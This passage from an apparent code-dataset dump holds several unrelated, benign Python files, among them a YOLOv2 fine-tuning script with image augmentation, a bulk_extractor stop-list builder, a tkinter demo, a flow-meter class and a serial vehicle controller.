sub_image_rechts.append(np.array([pattern_id,x_min,y_min,x_max,y_max]))\n\n return image_path, np.array(sub_image_rechts)\n\n\n\n#http://docs.opencv.org/3.1.0/da/d6e/tutorial_py_geometric_transformations.html\ndef apply_transform(img,\n transform_matrix):\n\n \"\"\"Apply the image transformation specified by a matrix.\n # Arguments\n img: 2D numpy array, single image.\n transform_matrix: Numpy array specifying the geometric transformation.\n # Returns\n The transformed version of the input.\n \"\"\"\n rows,cols = img.shape[:2]\n dst = cv2.warpAffine(img,transform_matrix,(cols,rows))\n\n\n return dst\n\ndef random_shift(img, wrg, hrg, rects, row_axis=0, col_axis=1, channel_axis=2,\n fill_mode='nearest', cval=0.):\n \"\"\"Performs a random spatial shift of a Numpy image tensor.\n # Arguments\n img: Input tensor. 
Must be 3D.\n wrg: Width shift range, as a float fraction of the width.\n hrg: Height shift range, as a float fraction of the height.\n row_axis: Index of axis for rows in the input tensor.\n col_axis: Index of axis for columns in the input tensor.\n channel_axis: Index of axis for channels in the input tensor.\n fill_mode: Points outside the boundaries of the input\n are filled according to the given mode\n (one of `{'constant', 'nearest', 'reflect', 'wrap'}`).\n cval: Value used for points outside the boundaries\n of the input if `mode='constant'`.\n # Returns\n Shifted Numpy image tensor.\n \"\"\"\n h, w = img.shape[row_axis], img.shape[col_axis]\n tx = np.random.uniform(-hrg, hrg) * h\n ty = np.random.uniform(-wrg, wrg) * w\n\n min_x = min(rects[:,1])\n max_x = max(rects[:,3])\n min_y = min(rects[:,2])\n max_y = max(rects[:,4])\n\n if tx + min_x < 0:\n tx = -min_x\n if tx + max_x > w:\n tx = w-max_x\n if ty + min_y < 0:\n ty = -min_y\n if ty + max_y > h:\n ty = h - max_y\n\n translation_matrix = np.float32([[1,0,tx],[0,1,ty]])\n\n transform_matrix = translation_matrix # no need to do offset\n img = apply_transform(img, transform_matrix)\n\n rects[:,1] = rects[:,1] + tx\n rects[:,3] = rects[:,3] + tx\n\n rects[:,2] = rects[:,2] + ty\n rects[:,4] = rects[:,4] + ty\n\n return img, rects\n\ndef flip_image(image, rects, axis = 1):\n \"\"\"\n axis equals zero = vertical flip \n axis equals one = horizontal flip \n axis equals minus one = flip both axes\n any other axis value = no flip\n \"\"\"\n\n if axis not in [-1,0,1]:\n return image, rects\n\n height = image.shape[0]\n width = image.shape[1]\n \n image = cv2.flip(image,axis)\n\n if axis == 1:\n rects[:,1] = width - rects[:,1]\n rects[:,3] = width - rects[:,3]\n rects[:,3], rects[:,1] = rects[:,1].copy(),rects[:,3].copy()\n elif axis == 0:\n rects[:,2] = height - rects[:,2]\n rects[:,4] = height - rects[:,4]\n rects[:,4], rects[:,2] = rects[:,2].copy(),rects[:,4].copy()\n elif axis == -1:\n rects[:,1] = width - rects[:,1]\n rects[:,3] = width - rects[:,3]\n rects[:,3], rects[:,1] = rects[:,1].copy(),rects[:,3].copy()\n rects[:,2] = height - rects[:,2]\n rects[:,4] = height - rects[:,4]\n rects[:,4], rects[:,2] = rects[:,2].copy(),rects[:,4].copy()\n\n return image, rects\n\ndef image_intensity_shift(image, intensity, channel = 1, min_intensity = 0, max_intensity = 255):\n\n non_zero_pixel = np.where(image[:,:,channel] > 0)\n min_val = np.min(image[:,:,channel][non_zero_pixel])\n max_val = np.max(image[:,:,channel])\n\n new_intensity_center = int(np.random.uniform(-intensity, intensity))\n\n if new_intensity_center + min_val < 0:\n new_intensity_center = -min_val\n if new_intensity_center + max_val > 255:\n new_intensity_center = 255 - max_val\n \n image[:,:,channel][non_zero_pixel] = image[:,:,channel][non_zero_pixel] + new_intensity_center\n\n return image\n\ndef new_background_image_mask(image,rects,alpha_value = 0.7, background_image_path = \"images/giraffe.jpg\"):\n\n foreground = image.copy().astype(float)\n background = cv2.imread(background_image_path).astype(float)\n background = cv2.resize(background,(foreground.shape[1],foreground.shape[0]))\n\n alpha = np.zeros_like(foreground).astype(float) \n \n for rect in rects:\n xmin = rect[1]\n ymin = rect[2]\n\n width = rect[3] - xmin\n height = rect[4] - ymin\n cv2.rectangle(alpha,(xmin,ymin),(xmin+width,ymin+height),(alpha_value,alpha_value,alpha_value),-1)\n\n foreground = cv2.multiply(alpha, foreground)\n\n background = cv2.multiply(1 - alpha, background)\n\n outImage = cv2.add(foreground, background)\n\n 
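# Editor's note: a quick self-check of the horizontal-flip box math in
# flip_image above: after mirroring x across the image width, x_min and
# x_max must be swapped to stay ordered. Values here are illustrative only.
import numpy as np

width = 100
rects = np.array([[1, 10, 20, 30, 40]])  # class, x_min, y_min, x_max, y_max
rects[:, 1] = width - rects[:, 1]
rects[:, 3] = width - rects[:, 3]
rects[:, 3], rects[:, 1] = rects[:, 1].copy(), rects[:, 3].copy()
assert (rects[0][1], rects[0][3]) == (70, 90)  # still x_min < x_max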
return outImage.astype(int)\n\ndef new_background_image(image,alpha_value = 0.7,background_image_path = \"images/giraffe.jpg\"):\n\n background = cv2.imread(background_image_path)\n background = cv2.resize(background,(image.shape[1],image.shape[0]))\n\n result = cv2.addWeighted(image,alpha_value,background,1-alpha_value,0)\n\n return result\n\n\n\n# Args\nargparser = argparse.ArgumentParser(\n description=\"Retrain or 'fine-tune' a pretrained YOLOv2 model for your own data.\")\n\nargparser.add_argument(\n '-d',\n '--data_path',\n help=\"path to the training data\",\n default=os.path.join('model_data', 'Hep', 'train_images_yolo.p'))\n\nargparser.add_argument(\n '-v',\n '--validation_data_path',\n help=\"path to the validation data\",\n default=os.path.join('model_data', 'Hep', 'validation_images_yolo.p'))\n\nargparser.add_argument(\n '-a',\n '--anchors_path',\n help='path to anchors file, defaults to yolo_anchors.txt',\n default=os.path.join('model_data',\"Hep\", 'yolo_anchors.txt'))\n\nargparser.add_argument(\n '-c',\n '--classes_path',\n help='path to classes file, defaults to pascal_classes.txt',\n default=os.path.join('model_data', 'Hep', 'hep_classes.txt'))\n\n# Default anchor boxes\nYOLO_ANCHORS = np.array(\n ((0.57273, 0.677385), (1.87446, 2.06253), (3.33843, 5.47434),\n (7.88282, 3.52778), (9.77052, 9.16828)))\n\n\ndef _main(args):\n data_path = os.path.expanduser(args.data_path)\n validation_data_path = os.path.expanduser(args.validation_data_path)\n classes_path = os.path.expanduser(args.classes_path)\n anchors_path = os.path.expanduser(args.anchors_path)\n\n class_names = get_classes(classes_path)\n anchors = get_anchors(anchors_path)\n\n xml_paths = glob.glob('C:/Users/Bronzi/Downloads/Train/*.xml', recursive=True)\n\n random.shuffle(xml_paths)\n \n imageDataGenerator_training = ImageDataGenerator(args.data_path,2,anchors)\n \n #for stuff in imageDataGenerator_training:\n # break;\n # print (\"\")\n \n #imageDataGenerator_validation = ImageDataGenerator(args.data_path,2,anchors)\n\n operations = {\n \"flip\":[1,0,-1,4],\n \"random_shift\":\n {\n \"max_x_shift\":0.5,\n \"max_y_shift\":0.5\n },\n \"intensity_shift\": [(1,50),(2,50)],\n }\n\n imageDataGenerator_training = ImageDataGeneratorXML_RegionCNN(xml_paths[:30],2,anchors,operations)\n imageDataGenerator_validation = ImageDataGeneratorXML_RegionCNN(xml_paths[30:] ,2,anchors)\n\n anchors = YOLO_ANCHORS\n model_body, model = create_model(anchors, class_names)\n\n train(\n model,\n class_names,\n anchors,\n imageDataGenerator_training,\n imageDataGenerator_validation\n )\n\n #draw(model_body,\n # class_names,\n # anchors,\n # imageDataGenerator_validation,\n # weights_name='trained_stage_3_best.h5',\n # save_all=False)\n\n\ndef get_classes(classes_path):\n '''loads the classes'''\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\ndef get_anchors(anchors_path):\n '''loads the anchors from a file'''\n if os.path.isfile(anchors_path):\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n return np.array(anchors).reshape(-1, 2)\n else:\n print(\"Could not open anchors file, using default.\")\n return YOLO_ANCHORS\n\ndef process_data_new(image, boxes=None):\n '''processes the data'''\n #images = [Image.open(i).convert('RGB') for i in images]\n orig_size = np.array([image.shape[1], image.shape[0]]) # width, height\n orig_size = np.expand_dims(orig_size, axis=0) \n\n # Image preprocessing.\n 
processed_image = cv2.resize(image,(target_width, target_height)).astype(float)\n processed_image = processed_image / 255.\n\n #processed_images = [i.resize((target_width, target_height), Image.BICUBIC) for i in images]\n #processed_images = [np.array(image, dtype=float) for image in processed_images]\n #processed_images = [image/255. for image in processed_images]\n\n if boxes is not None:\n # Box preprocessing.\n # Original boxes stored as 1D list of class, x_min, y_min, x_max, y_max.\n boxes = [box.reshape((-1, 5)) for box in boxes]\n # Get extents as y_min, x_min, y_max, x_max, class for comparison with\n # model output.\n boxes_extents = [box[:, [2, 1, 4, 3, 0]] for box in boxes]\n\n # Get box parameters as x_center, y_center, box_width, box_height, class.\n boxes_xy = [0.5 * (box[:, 3:5] + box[:, 1:3]) for box in boxes]\n boxes_wh = [box[:, 3:5] - box[:, 1:3] for box in boxes]\n boxes_xy = [boxxy / orig_size for boxxy in boxes_xy]\n boxes_wh = [boxwh / orig_size for boxwh in boxes_wh]\n boxes = [np.concatenate((boxes_xy[i], boxes_wh[i], box[:, 0:1]), axis=1) for i, box in enumerate(boxes)]\n\n result = []\n for box in boxes:\n result.append(box.flatten())\n\n return processed_image, np.array(result)\n else:\n return processed_image\n\ndef process_data(images, boxes=None):\n '''processes the data'''\n images = [Image.open(i).convert('RGB') for i in images]\n orig_size = np.array([images[0].width, images[0].height])\n orig_size = np.expand_dims(orig_size, axis=0)\n\n # Image preprocessing.\n processed_images = [i.resize((target_width, target_height), Image.BICUBIC) for i in images]\n processed_images = [np.array(image, dtype=float) for image in processed_images]\n processed_images = [image/255. for image in processed_images]\n\n if boxes is not None:\n # Box preprocessing.\n # Original boxes stored as 1D list of class, x_min, y_min, x_max, y_max.\n boxes = [box.reshape((-1, 5)) for box in boxes]\n # Get extents as y_min, x_min, y_max, x_max, class for comparison with\n # model output.\n boxes_extents = [box[:, [2, 1, 4, 3, 0]] for box in boxes]\n\n # Get box parameters as x_center, y_center, box_width, box_height, class.\n boxes_xy = [0.5 * (box[:, 3:5] + box[:, 1:3]) for box in boxes]\n boxes_wh = [box[:, 3:5] - box[:, 1:3] for box in boxes]\n boxes_xy = [boxxy / orig_size for boxxy in boxes_xy]\n boxes_wh = [boxwh / orig_size for boxwh in boxes_wh]\n boxes = [np.concatenate((boxes_xy[i], boxes_wh[i], box[:, 0:1]), axis=1) for i, box in enumerate(boxes)]\n\n # find the max number of boxes\n max_boxes = 0\n for boxz in boxes:\n if boxz.shape[0] > max_boxes:\n max_boxes = boxz.shape[0]\n\n # add zero pad for training\n for i, boxz in enumerate(boxes):\n if boxz.shape[0] < max_boxes:\n zero_padding = np.zeros( (max_boxes-boxz.shape[0], 5), dtype=np.float32)\n boxes[i] = np.vstack((boxz, zero_padding))\n\n return np.array(processed_images), np.array(boxes)\n else:\n return np.array(processed_images)\n\n\ndef get_detector_mask(boxes, anchors):\n '''\n Precompute detectors_mask and matching_true_boxes for training.\n Detectors mask is 1 for each spatial position in the final conv layer and\n anchor that should be active for the given boxes and 0 otherwise.\n Matching true boxes gives the regression targets for the ground truth box\n that caused a detector to be active or 0 otherwise.\n '''\n detectors_mask = [0 for i in range(len(boxes))]\n matching_true_boxes = [0 for i in range(len(boxes))]\n for i, box in enumerate(boxes):\n detectors_mask[i], matching_true_boxes[i] = 
preprocess_true_boxes(box, anchors, [target_width, target_height])\n\n return np.array(detectors_mask), np.array(matching_true_boxes)\n\ndef create_model(anchors, class_names, load_pretrained=True, freeze_body=True):\n '''\n returns the body of the model and the model\n\n # Params:\n\n load_pretrained: whether or not to load the pretrained model or initialize all weights\n\n freeze_body: whether or not to freeze all weights except for the last layer's\n\n # Returns:\n\n model_body: YOLOv2 with new output layer\n\n model: YOLOv2 with custom loss Lambda layer\n\n '''\n\n detectors_mask_shape = (26, 26, 5, 1)\n matching_boxes_shape = (26, 26, 5, 5)\n\n # Create model input layers.\n image_input = Input(shape=(target_width, target_height, 3))\n boxes_input = Input(shape=(None, 5))\n detectors_mask_input = Input(shape=detectors_mask_shape)\n matching_boxes_input = Input(shape=matching_boxes_shape)\n\n # Create model body.\n yolo_model = yolo_body(image_input, len(anchors), len(class_names))\n topless_yolo = Model(yolo_model.input, yolo_model.layers[-2].output)\n\n if load_pretrained:\n # Save topless yolo:\n topless_yolo_path = os.path.join('model_data', 'yolo_topless.h5')\n if not os.path.exists(topless_yolo_path):\n print(\"CREATING TOPLESS WEIGHTS FILE\")\n yolo_path = os.path.join('model_data', 'yolo.h5')\n model_body = load_model(yolo_path)\n model_body = Model(model_body.inputs, model_body.layers[-2].output)\n model_body.save_weights(topless_yolo_path)\n topless_yolo.load_weights(topless_yolo_path)\n\n if freeze_body:\n for layer in topless_yolo.layers:\n layer.trainable = False\n final_layer = Conv2D(len(anchors)*(5+len(class_names)), (1, 1), activation='linear')(topless_yolo.output)\n\n model_body = Model(image_input, final_layer)\n\n # Place model loss on CPU to reduce GPU memory usage.\n with tf.device('/cpu:0'):\n # TODO: Replace Lambda with custom Keras layer for loss.\n model_loss = Lambda(\n yolo_loss,\n output_shape=(1, ),\n name='yolo_loss',\n arguments={'anchors': anchors,\n 'num_classes': len(class_names)})([\n model_body.output, boxes_input,\n detectors_mask_input, matching_boxes_input\n ])\n\n model = Model(\n [model_body.input, boxes_input, detectors_mask_input,\n matching_boxes_input], model_loss)\n\n return model_body, model\n\ndef train(model, class_names, anchors, imageDataGenerator_training, imageDataGenerator_validation):\n '''\n retrain/fine-tune the model\n\n logs training with tensorboard\n\n saves training weights in current directory\n\n best weights according to val_loss is saved as trained_stage_3_best.h5\n '''\n model.compile(\n optimizer='adam', loss={\n 'yolo_loss': lambda y_true, y_pred: y_pred\n }) # This is a hack to use the custom loss function in the last layer.\n\n\n logging_1 = TensorBoard(log_dir=\"log/log_1\")\n logging_2 = TensorBoard(log_dir=\"log/log_2\")\n logging_3 = TensorBoard(log_dir=\"log/log_3\")\n checkpoint = ModelCheckpoint(\"trained_stage_3_best.h5\", monitor='val_loss',\n save_weights_only=True, save_best_only=True)\n early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=15, verbose=1, mode='auto')\n\n\n model.fit_generator(imageDataGenerator_training,\n validation_data= imageDataGenerator_validation,\n samples_per_epoch = 30,\n callbacks=[logging_1],\n nb_epoch=10,\n validation_steps=1)\n\n #model.fit([image_data, boxes, detectors_mask, matching_true_boxes],\n # np.zeros(len(image_data)),\n # validation_split=validation_split,\n # batch_size=32,\n # epochs=100,\n # callbacks=[logging])\n 
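# Editor's note: a minimal sketch of the "loss as a layer" trick used by
# create_model/train above: the real loss is computed inside a Lambda layer,
# and Keras is given a pass-through loss that simply returns that layer's
# output. Assumes the same keras package this script already imports; the
# Lambda body is a stand-in for yolo_loss, not the actual YOLO loss.
from keras import backend as K
from keras.layers import Input, Lambda
from keras.models import Model

inp = Input(shape=(4,))
loss_out = Lambda(lambda t: K.sum(K.square(t), axis=-1, keepdims=True),
                  name='yolo_loss')(inp)
model = Model(inp, loss_out)
# y_true is ignored; the "loss" is whatever the Lambda layer produced.
model.compile(optimizer='adam',
              loss={'yolo_loss': lambda y_true, y_pred: y_pred})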
model.save_weights('trained_stage_1.h5')\n\n model_body, model = create_model(anchors, class_names, load_pretrained=False, freeze_body=False)\n\n model.load_weights('trained_stage_1.h5')\n\n model.compile(\n optimizer='adam', loss={\n 'yolo_loss': lambda y_true, y_pred: y_pred\n }) # This is a hack to use the custom loss function in the last layer.\n\n\n model.fit_generator(imageDataGenerator_training,\n validation_data= imageDataGenerator_validation,\n samples_per_epoch = 30,\n callbacks=[logging_2],\n nb_epoch=10,\n validation_steps=1)\n\n #model.fit([image_data, boxes, detectors_mask, matching_true_boxes],\n # np.zeros(len(image_data)),\n # validation_split=0.1,\n # batch_size=8,\n # epochs=4*30,\n # callbacks=[logging])\n\n model.save_weights('trained_stage_2.h5')\n\n #model.fit([image_data, boxes, detectors_mask, matching_true_boxes],\n # np.zeros(len(image_data)),\n # validation_split=0.1,\n # batch_size=8,\n # epochs=4*30,\n # callbacks=[logging, checkpoint, early_stopping])\n\n model.fit_generator(imageDataGenerator_training,\n validation_data= imageDataGenerator_validation,\n samples_per_epoch = 30,\n callbacks=[logging_3,checkpoint],\n nb_epoch=10,\n validation_steps=1)\n\n model.save_weights('trained_stage_3.h5')\n\n #model.save(\"YOLO_Hep.hdf5\")\n\ndef draw(model_body, class_names, anchors, image_data, image_set='val',\n weights_name='trained_stage_3_best.h5', out_path=\"output_images\", save_all=True):\n '''\n Draw bounding boxes on image data\n '''\n\n # model.load_weights(weights_name)\n #print(image_data.shape)\n model_body.load_weights(weights_name)\n\n # Create output variables for prediction.\n yolo_outputs = yolo_head(model_body.output, anchors, len(class_names))\n input_image_shape = K.placeholder(shape=(2, ))\n boxes, scores, classes = yolo_eval(\n yolo_outputs, input_image_shape, score_threshold=0.07, iou_threshold=0)\n\n # Run prediction on overfit image.\n sess = K.get_session() # TODO: Remove dependence on Tensorflow session.\n\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n for i in range(len(image_data)):\n out_boxes, out_scores, out_classes = sess.run(\n [boxes, scores, classes],\n feed_dict={\n model_body.input: image_data[i],\n input_image_shape: [image_data.shape[2], image_data.shape[3]],\n K.learning_phase(): 0\n })\n print('Found {} boxes for image.'.format(len(out_boxes)))\n print(out_boxes)\n\n # Plot image with predicted boxes.\n image_with_boxes = draw_boxes(image_data[i][0], out_boxes, out_classes,\n class_names, out_scores)\n # Save the image:\n if save_all or (len(out_boxes) > 0):\n image = Image.fromarray(image_with_boxes)\n image.save(os.path.join(out_path,str(i)+'.png'))\n\n # To display (pauses the program):\n # plt.imshow(image_with_boxes, interpolation='nearest')\n # plt.show()\n\n\n\nif __name__ == '__main__':\n args = argparser.parse_args()\n _main(args)\n","sub_path":"retrain_yolo.py","file_name":"retrain_yolo.py","file_ext":"py","file_size_in_byte":26611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"481378210","text":"#!/usr/bin/python\n#\n# Read one or more output directories and create a single stop list.\n# Outputs as both a stop list and as a cdb data file\n\nimport sys\nif sys.version_info < (3,1):\n raise RuntimeError(\"idiffernece.py now requires Python 3.1 or above\")\n\nimport glob,re,os\nfrom subprocess import call,Popen,PIPE\n\nfeature_files = ['ccn.txt','domain.txt','email.txt','exif.txt', 'rfc822.txt','telephone.txt','url.txt','zip.txt']\n\ndef 
create_stop_list(featuredir,ofn):\n global options\n\n def process_file(fname):\n print(\"processing\",fname)\n for line in open(fname,'rb'):\n if line[:1]==b'#': continue\n if line[0:2]==b'n=': continue\n try:\n (offset,word,context) = line.split(b'\\t')\n stop_list[context.strip()] = fname\n except ValueError:\n pass\n\n stop_list = {}\n for (dirpath,dirnames,filenames) in os.walk(featuredir):\n for filename in filenames:\n if filename in feature_files:\n process_file(os.path.join(dirpath,filename))\n\n f = open(ofn,\"wb\")\n for key in sorted(stop_list.keys()):\n f.write(key)\n f.write(b'\\t')\n f.write(stop_list[key].encode('utf-8'))\n f.write(b'\\n')\n\nif __name__==\"__main__\":\n from optparse import OptionParser\n global options\n\n parser = OptionParser()\n parser.add_option(\"--wipe\",action=\"store_true\",default=False)\n parser.usage = \"\"\"usage: %prog [options] output-file.txt\\n\nEither process the virtual machines in [vmdir] or recursively read the feature files in [featuredir]\nand write to a context stop list for use with bulk_extractor.\"\"\"\n parser.add_option(\"--vmdir\",help=\"specifies a directory of virtual machines on which bulk_extractor should be run\")\n parser.add_option(\"--featuredir\",help=\"specifies the directory of output files for bulk_extractor and input dirs this program\")\n parser.add_option(\"--bulk_extractor\",help=\"specifies bulk_extractor executable to use\",default=\"bulk_extractor\")\n (options,args) = parser.parse_args()\n\n if len(args)==0:\n parser.print_help()\n exit(0)\n\n if options.vmdir:\n print(\"Running Bulk Extractor...\")\n vms = glob.glob(options.vmdir + \"/*/*-flat.vmdk\")\n os.mkdir(options.featuredir)\n for vm in vms:\n outname = os.path.join(options.featuredir,re.search(\"/([^/]*)-(tpl|flat)\",vm).group(1))\n cmd = [options.bulk_extractor,'-o',outname,vm]\n print(\"\\n\\n\\n\")\n print(\"Image {0} of {1}\".format(vms.index(vm),len(vms)))\n print(\" \".join(cmd))\n call(cmd)\n\n print(\"Creating stop list from\",options.featuredir)\n create_stop_list(options.featuredir,args[0])\n exit(0)\n \n \n\n\n\n \n\n\n\n\n","sub_path":"python/make_context_stop_list.py","file_name":"make_context_stop_list.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439266022","text":"\"\"\"Default configuration\n\nUse env var to override\n\"\"\"\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nDEBUG = True\nSECRET_KEY = os.getenv('SECRET_KEY')\n\nSQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI')\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nJSON_AS_ASCII = False\n\nJWT_BLACKLIST_ENABLED = True\nJWT_BLACKLIST_TOKEN_CHECKS = ['access', 'refresh']\n","sub_path":"{{cookiecutter.project_name}}/{{cookiecutter.app_name}}/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"494436135","text":"try:\n import tkinter\nexcept ImportError:\n import Tkinter as tkinter\n\n#print (tkinter.TkVersion)\n#print (tkinter.TclVersion)\n#tkinter._test()\n\nmainWindow = tkinter.Tk()\nmainWindow.title(\"Test Program\")\nmainWindow.geometry('640x480+980+200') #width height right down\n\nlabel= tkinter.Label(mainWindow,text= \"Test Program\")\n\nlabel.pack(side = 'top')\n\nleftFrame = tkinter.Frame(mainWindow)\nleftFrame.pack(side = 'left', anchor='n', fill = tkinter.Y, expand = False)\n\ncanvas = tkinter.Canvas(leftFrame, relief = 
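# Editor's note: the fix above (line[:1] == b'#') matters because indexing a
# bytes object in Python 3 yields an int, so line[0] == b'#' is always False
# and the comment filter silently never fires. A quick self-check:
line = b'# comment'
assert line[0] == 35             # int: the code point of '#'
assert line[0] != b'#'           # an int never equals a bytes object
assert line[:1] == b'#'          # slicing keeps the bytes type
assert line.startswith(b'#')     # the other idiomatic spelling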
'raised', borderwidth = 1)\ncanvas.pack(side = 'left', anchor='n')\n\nrightFrame = tkinter.Frame(mainWindow)\nrightFrame.pack(side='right', anchor='n', expand=True)\n\n\nbutton1 = tkinter.Button(rightFrame, text = 'Button 1')\nbutton2 = tkinter.Button(rightFrame, text = 'Button 2')\nbutton3 = tkinter.Button(rightFrame, text = 'Button 3')\n\nbutton1.pack(side = 'top', anchor = 'n')\nbutton2.pack(side = 'top', anchor= 's')\nbutton3.pack(side = 'top', anchor = 'e')\n\n\n\n\nmainWindow.mainloop()\n\n","sub_path":"test/tkinterdemo.py","file_name":"tkinterdemo.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"381644135","text":"import RPi.GPIO as GPIO\nimport atexit\nimport time\n\n\nclass FlowMeter:\n\n POUR_TIMEOUT = 3000\n\n _pouring = False\n _pour_count = 0\n _pour_start = 0\n _pour_last_pulse = int(time.time() * 1000)\n\n def __init__(self, pin, record_callback):\n if not pin:\n raise Exception('GPIO pin must be defined.')\n\n self._record_callback = record_callback\n\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(pin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n GPIO.add_event_detect(pin, GPIO.FALLING, callback=self._handle_pulse)\n\n # Make sure to cleanup GPIO\n atexit.register(GPIO.cleanup)\n\n def _handle_pulse(self, channel):\n current_time = int(time.time() * 1000)\n self._check_pour_status(current_time)\n\n self._pour_count = self._pour_count + 1\n self._pour_last_pulse = current_time\n\n def _check_pour_status(self, current_time):\n pour_delta = current_time - self._pour_last_pulse\n\n if pour_delta > self.POUR_TIMEOUT:\n self._record_callback(self._pour_start,\n self._pour_last_pulse,\n self._pour_count)\n self._new_pour()\n\n def _new_pour(self):\n self._pouring = True\n self._pour_count = 1\n self._pour_start = int(time.time() * 1000)\n","sub_path":"sidekeg/flow_meter.py","file_name":"flow_meter.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"285765572","text":"import asyncio\nfrom contextlib import contextmanager\nfrom threading import Thread\nfrom time import sleep\n\n\n@contextmanager\ndef assert_done_after(seconds):\n sleeper = Sleeper()\n sleeper.sleep_for(seconds)\n yield sleeper\n assert sleeper.done\n\n\nclass Sleeper:\n done = False\n\n def sleep_for(self, start):\n Thread(target=self._wake_up_after, args=(start,)).start()\n\n def _wake_up_after(self, seconds):\n sleep(seconds)\n self.done = True\n\n\nclass AsyncSleeper:\n SLEEP_DURATION = 0.5\n\n def __init__(self):\n self.awake = False\n\n async def sleep_for_a_bit(self):\n await asyncio.sleep(self.SLEEP_DURATION)\n self.awake = True\n\n async def get_awake_with_delay(self, delay_sec):\n awake = self.awake\n await asyncio.sleep(delay_sec)\n return awake\n","sub_path":"tests/sleeper.py","file_name":"sleeper.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"538044067","text":"import serial\n\nclass Vehicle:\n def __init__(self, port, baudrate):\n self.ser = serial.Serial(port, baudrate=baudrate)\n\n def __enter__(self):\n return self\n\n def __exit__(self, type, value, traceback):\n self.ser.close() \n\n def move_alt(self, cmd, delta_speed, delta_turn):\n if(len(cmd) != 4):\n print(\"Expected 4 arguments: forward, backward, left and right\")\n return\n \n speed_val = 250\n turn_val = 250\n forward, backward, left, right = cmd\n \n if(forward 
== '1'):\n speed_val += delta_speed\n elif(backward == '1'):\n speed_val -= delta_speed\n if(left == '1'):\n turn_val -= delta_turn\n elif(right == '1'):\n turn_val += delta_turn\n self.move(speed_val, turn_val)\n\n def move(self, speed, turn):\n \"\"\" Sets vehicle's speed and steering angle. Both variables are in the range of [0, 500].\n Speed:\n - 0: Go backwards at maximum speed\n - 250: Brake\n - 500: Go forwards at maximum speed\n Turn:\n - 0: Turn left (max)\n - 250: Straight\n - 500: Turn right (max)\n \"\"\"\n if(speed < 0 or speed > 500 or turn < 0 or turn > 500):\n print(\"Speed and turn must be within [0, 500] range\")\n return\n\n cmd1 = 'y1' + '{:0>3d}'.format(speed) + '!'\n cmd2 = 'y2' + '{:0>3d}'.format(turn) + '!'\n self.ser.write(cmd1.encode('ascii'))\n self.ser.write(cmd2.encode('ascii'))\n\n def reset(self):\n self.move(250, 250)","sub_path":"build/realworld/odroid/vehicle.py","file_name":"vehicle.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"19756496","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('main-page', views.main_page, name='main'),\n path('about-me', views.page_about_me, name='about_me'),\n path('skills', views.page_skills, name='page_skills'),\n path('causes', views.page_cause, name='page_causes'),\n path('feedback', views.FeedbackCreateView.as_view(), name='feedback'),\n]","sub_path":"web_site/employers_feedback/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"600257405","text":"#!/usr/bin/env python\nimport time\nimport tqdm\nimport argparse\nimport os\nimport numpy as np\nimport pandas as pd\nimport pickle\n\nfrom image_utils import similarity\n\nPREDICTION_LENGTH = 4096\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"-f\", \"--file\", default=\"/usr/src/app/files/files-urls.csv\", type=str, help=\"path to CSV file (default: /usr/src/app/files/files-urls.csv)\")\nparser.add_argument(\"-p\", \"--predictions_folder\", default=\"/usr/src/app/files/predictions\", type=str, help=\"Folder where predictions are located (default: /usr/src/app/files/predictions)\")\nparser.add_argument(\"-d\", \"--destination\", default=\"/usr/src/app/files/similarities\", type=str, help=\"Folder where to save results. Multiple files for each process will be created. 
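# Editor's note: a small sketch of the command framing used by Vehicle.move
# above: a value in [0, 500] is zero-padded to three digits between a channel
# prefix ('y1' speed / 'y2' turn) and a '!' terminator. The clamp helper is
# hypothetical, not part of the class.
def frame_command(channel, value):
    value = max(0, min(500, value))  # clamp into the protocol's range
    return 'y{}{:0>3d}!'.format(channel, value)

assert frame_command(1, 250) == 'y1250!'
assert frame_command(2, 999) == 'y2500!'  # clamped to the maximum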
(default: /usr/src/app/files/similarities)\")\nparser.add_argument('--overwrite', action='store_true', help='Overwrite existing files if they exist')\n\nargs = parser.parse_args()\n\nfile = args.file\npredictions_folder = args.predictions_folder\ndestination = args.destination\noverwrite = args.overwrite\n\nif (not os.path.exists(file)):\n print(\"File %s does not exist.\" % file)\n exit()\n\nif (not os.path.exists(predictions_folder)):\n print(\"Folder %s does not exist.\" % predictions_folder)\n exit()\n\nif (not os.path.exists(destination)):\n print(\"Folder %s does not exist.\" % destination)\n exit()\n\n# get the base name for output file creation\nfullname = os.path.basename(file)\nbase = os.path.splitext(fullname)[0]\npca_filename = \"%s/%s_pca.p\" % (destination, base)\numap_filename = \"%s/%s_umap.p\" % (destination, base)\noutput_filename = \"%s/%s.txt\" % (destination, base)\n\nstarttime = time.time()\n\nurl_df = pd.read_csv(file, index_col=\"access_pid\")\n\ncount = len(url_df.filename)\n\nprint(\"Getting similarity for %s files.\" % count)\n\ndef skip_row(id, features, skipped):\n skipped.append(id)\n features.append(np.zeros(shape=(PREDICTION_LENGTH,)))\n return features, skipped\n\ndef load_predictions():\n skipped = []\n features = []\n 